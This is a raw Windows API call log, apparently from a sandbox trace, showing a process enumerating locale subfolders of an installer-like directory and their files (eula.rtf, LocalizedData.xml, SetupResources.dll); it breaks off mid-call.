FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.036] FindClose (in: hFindFile=0x604978 | out: hFindFile=0x604978) returned 1 [0196.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.036] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0196.036] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0196.037] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.037] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.038] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.038] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.038] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.040] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0196.040] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.040] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0196.040] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.040] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.041] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.041] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.041] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.041] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.041] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.041] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.041] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0196.041] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604278 [0196.043] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.043] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.043] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.043] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.043] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.049] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0196.049] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.049] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0196.049] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604238 [0196.049] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.049] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.049] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.050] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.050] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.050] FindClose (in: hFindFile=0x604238 | out: hFindFile=0x604238) returned 1 [0196.050] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.050] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0196.050] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6046f8 [0196.050] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.050] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.050] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.051] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.051] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.051] FindClose (in: hFindFile=0x6046f8 | out: hFindFile=0x6046f8) returned 1 [0196.051] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.051] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0196.051] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0196.051] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.051] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.051] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.052] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.052] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.052] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0196.052] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.052] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0196.052] FindFirstFileW (in: 